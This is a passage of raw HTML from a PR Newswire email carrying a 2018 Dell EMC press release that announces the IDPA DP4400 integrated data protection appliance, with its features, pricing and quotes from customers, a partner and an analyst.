style="padding:0;text-align:left;vertical-align:top"><th class="small-12 large-12 columns first last" style="Margin:0 auto;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0 auto;padding:0;padding-bottom:16px;padding-left:30px;padding-right:30px;text-align:left;width:570px"><table style="border-collapse:collapse;border-spacing:0;padding:0;text-align:left;vertical-align:top;width:100%"><tr style="padding:0;text-align:left;vertical-align:top"><th style="Margin:0;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0;padding:0;text-align:left"><table class="spacer" style="border-collapse:collapse;border-spacing:0;padding:0;text-align:left;vertical-align:top;width:100%"><tbody><tr style="padding:0;text-align:left;vertical-align:top"><td height="24px" style="-moz-hyphens:auto;-webkit-hyphens:auto;Margin:0;border-collapse:collapse!important;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:24px;font-weight:400;hyphens:auto;line-height:24px;margin:0;mso-line-height-rule:exactly;padding:0;text-align:left;vertical-align:top;word-wrap:break-word">&#xA0;</td></tr></tbody></table> <p class="text-center view-in-browser" style="Margin:0;Margin-bottom:10px;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0;margin-bottom:0;padding:0;text-align:center"><small style="color:#cacaca;font-size:80%"><a href='http://email.prnewswire.com/wf/click?upn=z3qiKnBCpunqdJkRppsiEbSmnibeutBGHu9PCpp0b6U4Q4ZotzjXnIzJXOhYxAYUczEhwuacI3iWNG9gOgfP2M0yiGDzENztys997S-2BsSuA-3D_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJh91J1VC0OPfkW8ugtV9yNUVnAwfas1qo-2FdqP3YXiuwwH1P47SI2os1hnqwEfx1qG5ZCZW9iOnow2ObdfMLYXREfmhcQkIQDQoskItZAKxagJADB1NWEhohnV-2F9dAlwGJw9AFyWimV2fDUoKzcKVoNQ-3D-3D'style='Margin:0;color:#00607F;font-family:Montserrat,Arial,sans-serif;font-weight:400;line-height:1.3;margin:0;padding:0;text-align:left;text-decoration:none'>View in Browser</a></small> </p> </th><th class="expander" style="Margin:0;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0;padding:0!important;text-align:left;visibility:hidden;width:0"></th></tr></table></th>  </tr></tbody></table><table class="row sub-header"style="background:#00837E;border-collapse:collapse;border-spacing:0;display:table;padding:0;position:relative;text-align:left;vertical-align:top;width:100%"><tbody><tr  style="padding:0;text-align:left;vertical-align:top"><th class="small-12 large-12 columns first last" style="Margin:0 auto;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0 auto;padding:0;padding-bottom:16px;padding-left:30px;padding-right:30px;text-align:left;width:570px"><table style="border-collapse:collapse;border-spacing:0;padding:0;text-align:left;vertical-align:top;width:100%"><tr style="padding:0;text-align:left;vertical-align:top"><th style="Margin:0;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0;padding:0;text-align:left"><table class="spacer" style="border-collapse:collapse;border-spacing:0;padding:0;text-align:left;vertical-align:top;width:100%"><tbody><tr style="padding:0;text-align:left;vertical-align:top"><td height="16px" style="-moz-hyphens:auto;-webkit-hyphens:auto;Margin:0;border-collapse:collapse!important;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;hyphens:auto;line-height:16px;margin:0;mso-line-height-rule:exactly;padding:0;text-align:left;vertical-align:top;word-wrap:break-word">&#xA0;</td></tr></tbody></table>  <h4 class="text-center" style="-moz-hyphens:none;-webkit-hyphens:none;Margin:0;Margin-bottom:10px;color:#fff;font-family:Montserrat,Arial,sans-serif;font-size:18px;font-weight:400;hyphens:none;line-height:22px;margin:0;margin-bottom:10px;padding:0;text-align:center;text-transform:uppercase;word-break:none;word-wrap:normal">News From Dell EMC</h4><h5 class="text-center" style="-moz-hyphens:none;-webkit-hyphens:none;Margin:0;Margin-bottom:10px;color:#fff;font-family:Montserrat,Arial,sans-serif;font-size:14px;font-weight:500;hyphens:none;line-height:18px;margin:0;margin-bottom:0;padding:0;text-align:center;word-break:none;word-wrap:normal">Transmitted by PR Newswire for Journalists on <span class="prevent-break" style="display:inline-block">July 11, 2018 08:00 AM EST </span></h5></th><th class="expander" style="Margin:0;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0;padding:0!important;text-align:left;visibility:hidden;width:0"></th></tr></table></th></tr></tbody></table><table class="row header" style="background:#e5f2f3;border-collapse:collapse;border-spacing:0;display:table;padding:0;position:relative;text-align:left;vertical-align:top;width:100%"><tbody><tr style="padding:0;text-align:left;vertical-align:top"><th class="small-12 large-12 columns first last" style="Margin:0 auto;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0 auto;padding:0;padding-bottom:0;padding-left:30px;padding-right:30px;text-align:left;width:570px"><table style="border-collapse:collapse;border-spacing:0;padding:0;text-align:left;vertical-align:top;width:100%"><tr style="padding:0;text-align:left;vertical-align:top"><th style="Margin:0;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0;padding:0;text-align:left">                <table class="spacer" style="border-collapse:collapse;border-spacing:0;padding:0;text-align:left;vertical-align:top;width:100%"><tbody><tr style="padding:0;text-align:left;vertical-align:top"><td height="24px" style="-moz-hyphens:auto;-webkit-hyphens:auto;Margin:0;border-collapse:collapse!important;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:24px;font-weight:400;hyphens:auto;line-height:24px;margin:0;mso-line-height-rule:exactly;padding:0;text-align:left;vertical-align:top;word-wrap:break-word">&#xA0;</td></tr></tbody></table>               <h1 style="Margin:0;Margin-bottom:10px;color:#4D4E53;font-family:Montserrat,Arial,sans-serif;font-size:20px;font-weight:500;line-height:28px;margin:0;margin-bottom:0;padding:0;text-align:left;word-wrap:normal">Dell EMC Offers Mid-Size Organizations Simply Powerful Data Protection at the Lowest Cost to Protect</h1> <table class="spacer" style="border-collapse:collapse;border-spacing:0;padding:0;text-align:left;vertical-align:top;width:100%"><tbody><tr style="padding:0;text-align:left;vertical-align:top"><td height="24px" style="-moz-hyphens:auto;-webkit-hyphens:auto;Margin:0;border-collapse:collapse!important;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:24px;font-weight:400;hyphens:auto;line-height:24px;margin:0;mso-line-height-rule:exactly;padding:0;text-align:left;vertical-align:top;word-wrap:break-word">&#xA0;</td></tr></tbody></table> </th><th class="expander" style="Margin:0;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0;padding:0!important;text-align:left;visibility:hidden;width:0"></th></tr></table></th>              </tr></tbody></table> <table class="row content" style="background:#fff;border-collapse:collapse;border-spacing:0;display:table;padding:0;position:relative;text-align:left;vertical-align:top;width:100%"><tbody><tr style="padding:0;text-align:left;vertical-align:top"><th class="small-12 large-12 columns first last" style="Margin:0 auto;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0 auto;padding:0;padding-bottom:16px;padding-left:30px;padding-right:30px;text-align:left;width:570px"><table style="border-collapse:collapse;border-spacing:0;padding:0;text-align:left;vertical-align:top;width:100%"><tr style="padding:0;text-align:left;vertical-align:top"><th style="Margin:0;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0;padding:0;text-align:left"> <table class="spacer" style="border-collapse:collapse;border-spacing:0;padding:0;text-align:left;vertical-align:top;width:100%"><tbody><tr style="padding:0;text-align:left;vertical-align:top"><td height="24px" style="-moz-hyphens:auto;-webkit-hyphens:auto;Margin:0;border-collapse:collapse!important;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:24px;font-weight:400;hyphens:auto;line-height:24px;margin:0;mso-line-height-rule:exactly;padding:0;text-align:left;vertical-align:top;word-wrap:break-word">&#xA0;</td></tr></tbody></table><p class="sub-headline" style="Margin:0;Margin-bottom:10px;color:#4D4E53;font-family:Montserrat,Arial,sans-serif;font-size:14px;font-weight:500;line-height:20px;margin:0;margin-bottom:16px;padding:0;text-align:left"><strong>New Dell EMC IDPA DP4400 delivers innovative capabilities and broad application support in a solution sized and priced right for mid-market customers</strong><p><span class="xn-location">HOPKINTON, Mass.</span>, <span class="xn-chron">July 11, 2018</span> /PRNewswire/ --</p> 
   <p><b>News Summary:</b></p><th class="expander" style="Margin:0;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0;padding:0!important;text-align:left;visibility:hidden;width:0"></th></tr></table></th></tr></tbody></table><table class="row content" style="background:#fff;border-collapse:collapse;border-spacing:0;display:table;padding:0;position:relative;text-align:left;vertical-align:top;width:100%"><tbody><tr style="padding:0;text-align:left;vertical-align:top"><th class="small-12 large-12 columns first last" style="Margin:0 auto;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0 auto;padding:0;padding-bottom:16px;padding-left:30px;padding-right:30px;text-align:left;width:570px"><table style="border-collapse:collapse;border-spacing:0;padding:0;text-align:left;vertical-align:top;width:100%"><tr style="padding:0;text-align:left;vertical-align:top"><th style="Margin:0;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0;padding:0;text-align:left"><center data-parsed="" style="min-width:510px;width:100%"><img src="https://mma.prnewswire.com/media/454747/DellEMC_Logo.jpg#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" alt="" align="center" class="float-center" style="-ms-interpolation-mode:bicubic;Margin:0 auto;clear:both;display:block;float:none;margin:0 auto;max-width:100%;outline:0;text-align:center;text-decoration:none;width:auto"></center></th><th class="expander" style="Margin:0;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0;padding:0!important;text-align:left;visibility:hidden;width:0"></th></tr></table></th></tr></tbody></table><table class="row content" style="background:#fff;border-collapse:collapse;border-spacing:0;display:table;padding:0;position:relative;text-align:left;vertical-align:top;width:100%"><tbody><tr style="padding:0;text-align:left;vertical-align:top"><th class="small-12 large-12 columns first last" style="Margin:0 auto;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0 auto;padding:0;padding-bottom:16px;padding-left:30px;padding-right:30px;text-align:left;width:570px"><table style="border-collapse:collapse;border-spacing:0;padding:0;text-align:left;vertical-align:top;width:100%"><tr style="padding:0;text-align:left;vertical-align:top"><th style="Margin:0;color:#0a0a0a;font-family:Montserrat,Arial,sans-serif;font-size:16px;font-weight:400;line-height:1.3;margin:0;padding:0;text-align:left">
   <ul type="disc">
    <li>New Dell EMC Integrated Data Protection Appliance (IDPA) DP4400 designed for mid-size organizations offers converged data protection—back-up, deduplication, replication and recovery, along with disaster recovery and long-term retention to the cloud </li>
    <li>Delivers lowest cost to protect, with up to 2x shorter backup times, protects up to 4x more data in single 2U appliance with average 55:1 data deduplication </li>
    <li>Simple to manage, deploy and upgrade; grows in place from 24-96TB – and up to 192TB in the cloud – with no additional hardware </li>
    <li>Leading-edge VMware integration empowers vAdmins to perform most common backup and recovery tasks directly from native vSphere UI </li>
    <li>Included in Dell EMC Future-Proof Loyalty Program, with new, up to 55:1 Data Protection Deduplication Guarantee </li>
   </ul>
   <p><b>Full Story:</b></p>
   <p><a href="http://email.prnewswire.com/wf/click?upn=7VDqtAz2AW-2FeY7XnbvsasayomdFKw5xhs-2Bl84JyoCnBxM3PIppbRAq-2FQNMEou-2FgO_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJM-2BetwWrYcCTvVI-2F-2BC0gn77iA-2BAOP4owpGB4P48ES2nG6VZc2MJjzqqXDjXQMyIgyCMv9C5AsIDbOhGSuu0orXVgBbvfXkEotsq0kVUSL1SHrDbKWiV8WOE4-2F-2BYsdiK8y6W40JaRFDLWfRyOdeiJT9w-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">Dell EMC</a> announced its newest Integrated Data Protection Appliance (IDPA), the Dell EMC IDPA DP4400, providing simple and powerful converged data protection to help mid-size organizations transform IT while <span id="spanHghlt9c32">combating</span> data sprawl and complexity. </p>
   <p>Comprehensive data protection has been a challenge for mid-size organizations.&nbsp; Enterprise-class products come with higher cost and complexity, while lower cost products that have traditionally targeted these organizations sacrifice performance, efficiency and application support. Dell EMC built the IDPA DP4400 from the ground up as a simple, yet powerful, solution for mid-size organizations—featuring enterprise-class capabilities for backup, deduplication, replication and recovery. IDPA DP4400 also offers built-in cloud readiness features with disaster recovery and long-term data retention to the cloud.</p>
   <p>"For years, mid-size organizations haven't quite had a comprehensive data protection solution that was sized and priced right for them," said <span class="xn-person">Beth Phalen</span>, President, Data Protection, Dell EMC. "With the IDPA DP4400 there are no compromises. We're delivering a converged data protection solution that's as simple to use as it is powerful —with support for the largest application ecosystem and expansion to the cloud. The IDPA DP4400 offers the right level of modern features and capabilities for mid-size data centers at the lowest cost to protect."</p>
   <p><b>Simple and Powerful, at the Lowest Cost to Protect</b></p>
   <p>The IDPA DP4400 blends simplicity and performance for mid-size organizations and remote office-branch office (ROBO) environments. The solution is designed to provide organizations the lowest cost to protect<sup>i</sup> and is guaranteed under the <a href="http://email.prnewswire.com/wf/click?upn=7VDqtAz2AW-2FeY7XnbvsasayomdFKw5xhs-2Bl84JyoCnDHbt3SaziDJ3aLK5sZaMLSfROQU9-2BUxGMs58ySGCetucGh3skmvXK77zR5CUMbXSgMSHLjj6KygpSEWN9QBeAt_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJMFcSCgtNtWfmHMaWZ8YYSCXFQFtH0V0vtbqyB9IHeOcmsDmB0PFPqOC1nBCyrgVYt1iSSrayif7FxKri9mu6liC-2FPa2UCteHy81flqDqCfPDp6fklWmOAfBqIgOfT44tycSK30l6FuxUEjvCWUwU3Q-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">Dell EMC Future-Proof Loyalty program</a>.</p>
   <p>The IDPA DP4400 is a converged data protection appliance in a dense 2U platform powered by Dell EMC PowerEdge 14<sup>th</sup> generation servers. Key features include:</p>
   <ul type="disc">
    <li><b>Customer-installable and easy-to-use HTML5 user interface:</b> Makes IDPA DP4400 ideal for deployment and management in mid-sized organizations and ROBO locations. </li>
    <li><b>Grows in place with no downtime: </b>A single 24TB appliance can grow in place to 96TB with a license key and no additional hardware to purchase. </li>
    <li><b>Protect more data with 55:1<b><sup>ii</sup></b> average deduplication: </b>IDPA DP4400 can protect approximately 5PB of usable data capacity. And, with native Cloud Tier for long-term retention, the total protected usable capacity increases to 14.4 PB. </li>
    <li><b>Supports largest application ecosystem<b><sup>iii</sup></b>: </b>Includes support for modern applications such as MySQL and MongoDB, both physical and virtual, and support for multiple hypervisors (VMware vSphere and Microsoft Hyper-V). </li>
    <li><b>Delivers powerful performance with NVMe flash:</b> Shortens backup windows by up to 2x<sup>iv</sup>; backs up only de-duplicated data requiring up to 98% less bandwidth<sup>v</sup>; and supports 7x more backup streams while delivering instant access and restore of virtual machines to help meet stringent SLAs and RPOs. </li>
    <li><b>Cloud-ready solution:</b> IDPA DP4400 comes with 5TB licenses each for Cloud Disaster Recovery and Cloud Tier as well as a Dell EMC <a href="http://email.prnewswire.com/wf/click?upn=7VDqtAz2AW-2FeY7XnbvsasTa7lrQmb0NwBa2-2BjgAaZMcKOQ-2BDPsBK2qW5RqO8dUWYkz2XEpzccGhCgZHa1C2tPbT6QUC4ug2AJIl7Afu-2BVp6GgxhW56jXC67jSSS-2BzGeQ_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJmfYnKkr8GKVuJauhgTabB3r2Hzw6oP-2F-2BJTkyyGVgz9npDVJC8cMSr473rZEdwnhiLAnwPVJChs0y07p-2BvhDuZeeBBJnR4Xde3ZRo9Y0A3swQfEG6kDx6LNJUrRPSAiU5Zy17cRod0aU1BTeFODLEhg-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">RecoverPoint for Virtual Machines</a> starter pack that provides five VMs and a one-year subscription<sup>vi</sup>.</li>
   </ul>
   <p>The IDPA DP4400 simplifies data protection management via a modern HTML 5 user interface that automates daily tasks including management, monitoring and reporting. In addition, integration with VMware native tools, SQL Server Management Studio and Oracle RMAN enables application administrators to leverage protection features within familiar user interfaces.</p>
   <p>With an average 55:1 deduplication rate, The IDPA DP4400 also offers efficient and cost-effective native Cloud Disaster Recovery (to Amazon AWS) with end-to-end orchestration—failover in three clicks, and failback in two clicks—all without the need for additional hardware. </p>
   <p>The IDPA DP4400 is optimized for VMware environments, with leading integration that enables vAdmins to perform most common backup and recovery tasks directly from the native vSphere UI. Protecting up to 5x more VMs in a single 2U appliance<sup>vii</sup> and with automation across the entire VMware data protection stack (VM deployment, deployment of proxies and movement of data to protection storage), the IDPA DP4400 makes it easy and cost-effective to scale up to protect more VMs. It also provides faster VMware backups and recoveries, and more efficient networking and capacity with its leading deduplication and bandwidth utilization.</p>
   <p>The IDPA DP4400 offers customers excellent value and TCO—costing up to 80% less to protect<sup>viii</sup>. With up to 2x faster backup windows<sup>ix</sup>, up to 20% more capacity in a 2U appliance<sup>x</sup>, and an average rate of 55:1 deduplication—it offers the lowest cost to protect among competing products in its class<sup>xi</sup>.</p>
   <p><b>Guaranteed under the Dell EMC Future-Proof Loyalty Program</b></p>
   <p>The IDPA DP4400 is part of the Dell EMC <a href="http://email.prnewswire.com/wf/click?upn=7VDqtAz2AW-2FeY7XnbvsasayomdFKw5xhs-2Bl84JyoCnDHbt3SaziDJ3aLK5sZaMLSfROQU9-2BUxGMs58ySGCetucGh3skmvXK77zR5CUMbXSgMSHLjj6KygpSEWN9QBeAt_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJzyncjqp7Auk-2FZ5-2FM0lMpXwSUdxfNBcshFx-2BdNbefa-2F-2BrPK2FJ2vQKOduKLvHbYOCNsht1-2BbDFaXK7mT2pX9RAhhkWKaRNB0N8KDm-2BsttSMfakxBQbkXaUiX5ncPvz98-2FYIIYnxMfvAFmT3kXpnWWKw-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">Future-Proof Loyalty Program</a>, offering a three-year Satisfaction Guarantee<sup>xii</sup>, Hardware Investment Protection<sup>xiii</sup>, up to 55:1 Data Protection Deduplication Guarantee<sup>xiv</sup>, and Clear Price—giving customers additional peace of mind with consistent and predictable maintenance pricing.</p>
   <p><b>Availability:</b></p>
   <p>The Dell EMC IDPA DP4400 is available immediately through Dell EMC and authorized channel partners, starting at under <span class="xn-money">US$80,000</span>. </p>
   <p><b>Customer Quotes:<br></b><i><span class="xn-person">Brian Linden</span>, IT Director, Melanson Heath<br></i>"The IDPA DP4400 is a great product because it's all in one. It's highly scalable so you know that you've got great expansion capabilities. Because it's Dell EMC, it's ready to go and I can trust that I don't have to do a lot of research and vetting to make sure it's going to work for me. That's peace of mind."</p>
   <p><i>John Sharp,&nbsp;IT Manager, The Vollrath Company<br></i>"Installation for IDPA DP4400 is easy. Within two hours we were off and running. I don't have to be <span class="xn-person">Lou Ferrigno</span> to rack a 2U. It goes in quick. It plugs in and is ready to back up our data. It just works!" </p>
   <p><b>Partner Quote:<br></b><i><span class="xn-person">Seife Teklu</span>, Senior Solutions Architect, Arrow Electronics<br></i>"Before the announcement of IDPA DP4400, customers deployed individual data protection software components. Some customers did not leverage monitoring, search, analytics and reporting tools that were available to them. Dell EMC IDPA DP4400 integrated data protection appliance introduces a simple intuitive management interface with enterprise features. IDPA DP4400 appliance saves time, reduces overall risk and provides customers the tools they need for deeper insight into their data protection environment, making it an ideal solution for SMB and SME customers."</p>
   <p><b>Industry Analyst Quote<br></b><i><span class="xn-person">Phil Goodwin</span>, Research Director, Storage Systems and Software, IDC<br></i>"Organizations today, especially mid-size organizations, are faced with increased complexity— relentless data growth, application diversity, increased numbers of users, and resource constraints—driving the need for solutions to meet these challenges with existing staff. However, users do not want to trade off simplicity for performance or capabilities. With the IDPA DP4400, Dell EMC is targeting a large swath of enterprises in that middle tier that want an all-in-one solution that is affordable, easy-to-use and has the modern data protection features they require to ensure their data is safe and their business can quickly recover in case disaster strikes."</p>
   <p><b>Additional Resources:</b></p>
   <ul type="disc">
    <li>Blog: <i>"</i><a href="http://email.prnewswire.com/wf/click?upn=pMc-2B4qiWiP-2FcAtcRzYB3t2WaDOvjUe-2BMcqTiy-2FkP3iUpLoOeViXxKX1vmMMFVGYxydJxXjyuFNHQw-2BtqLtxuhLFNwVyR-2BQW261U1Cz023d-2FEnN1QeMe5uKtPZA4fhYpHOsDhBW5Iwr9gFXeLwMSpXA-3D-3D_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJxy-2FMWetTratee48dI4atrY56OvvUqNiRqYYwOYRoi3RHp9wIH6d6qEdAcjTS7vnA-2FENoeJ3RkshrkiiuCL5fIRdoI233-2FfYPBJ2NfT6rDjP1pzBraDgozOMco03YIlPC4B759kETTosJ8o9UCEnYOg-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank"><i>Simply Powerful Data Protection for Midsize Orgs @ the Lowest Cost to Protect</i></a><i>"</i> </li>
    <li>Channel Blog: <i>"</i><a href="http://email.prnewswire.com/wf/click?upn=pMc-2B4qiWiP-2FcAtcRzYB3t2WaDOvjUe-2BMcqTiy-2FkP3iWlbcXMWsMU4ICmU41MycUwTUYCpueRKrnoIuOQcyO-2BU72oNrdsn5AcV1kzs-2B2t3f3dcx-2FRX47AUzKiaaDxHqpXxNHPQ2sbZPolQ6aja0qQh6F9lDB5crh1wI-2F29ulyUP4-3D_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJPkcX7p8NW-2FVZ5vXYbsQC8AdxdBRtYC45E6dZp9-2FOvlL-2B61uJ3pwyLuN8J-2Fo0C84U-2FOr-2FAs6I06G7G-2FNrdvFsRRo7syqePZ-2BSzGZfjeu0WJEP6KyAIPU7-2FBNLqlDjG68stOhY7mZiZoLHRxeBBDR0eA-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank"><i>Ride the HCI Growth Curve with the New Dell EMC Integrated Data Protection Appliance (IDPA) DP4400</i></a><i>"</i> </li>
    <li><a href="http://email.prnewswire.com/wf/click?upn=7VDqtAz2AW-2FeY7XnbvsasW2y7liqK4zhe0ySG3GqdZHiYUzUVzHTKOdPs-2FDd6Hn-2BO-2Bs9nwKK6JhmbKZSTErNIOHubjPLKks34ueySRa7d8dRJtwfOFLYyvxcgRPw6TlnfEFZQFyrlpy9cpfOhZqERKftZdGespykSWlmiWbTDsklRP1FgwebsSPhW2HP3LFRyW19aE0zwxPQWACcwYOwOA-3D-3D_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJoqKXldTHnc-2F0iYt7pvw0l2xq2ZcbxQxfINJUoczcD6tEe-2FLuskGDtIjK5auyMscUWcA95Ol-2FDbzXDcwsiG5IIoRR1pY-2BGcw7ep9csF5Rz7I9-2FIfsewSZOZLarobYAIvE3leW7IVQc4kbR8kq-2FZ-2FfMw-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">IDPA DP4400 data sheet</a> </li>
    <li><a href="http://email.prnewswire.com/wf/click?upn=7VDqtAz2AW-2FeY7XnbvsasWlZFlgFnh2SgtWvpxLEI80IFCcTlGubqhygW7XBZVRqXsaOloOiP4VpK6jrNSMh-2Bg-3D-3D_q1N77mbql2CxsoEfo2fFiZ6dnlev64IGUSa1KT1DDw1MuprZmQ6aap9NY9k0Le754nDm4PI-2BtkgM1S-2B9p-2Fn9q5ZJm1Q-2F2nzc5uTbm4YL3y3uKePsuB2bRB2Cp-2Br4SeKq9ERYnqvOyLi4QNP7KYh4bZUp7EVwsjR6VmznvUlIrQAaw2Bl5QXmWMRT3YN51QWJtXjmOah3sH2WPBcxqR10SrapalQ7PVvLww69UghVlRozG2gDTJuxl9KCL1R85gflw2i6UxctP3022mAS8ANyE4HgHtUu2jJXU026rEjru-2F6wmWoywAqmxpLj1rX2SjugqERHBLCv-2F6g6bVPP5OLkpQ-3D-3D#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" rel="nofollow#source%3Dgooglier%2Ecom#https%3A%2F%2Fgooglier%2Ecom%2Fpage%2F%2F10000" target="_blank">Tune in to our <span class="xn-chron">August 15</span> Wikibon CrowdChat</a> – Discuss the IDPA DP4400 with Dell EMC's Data Protection experts </li>
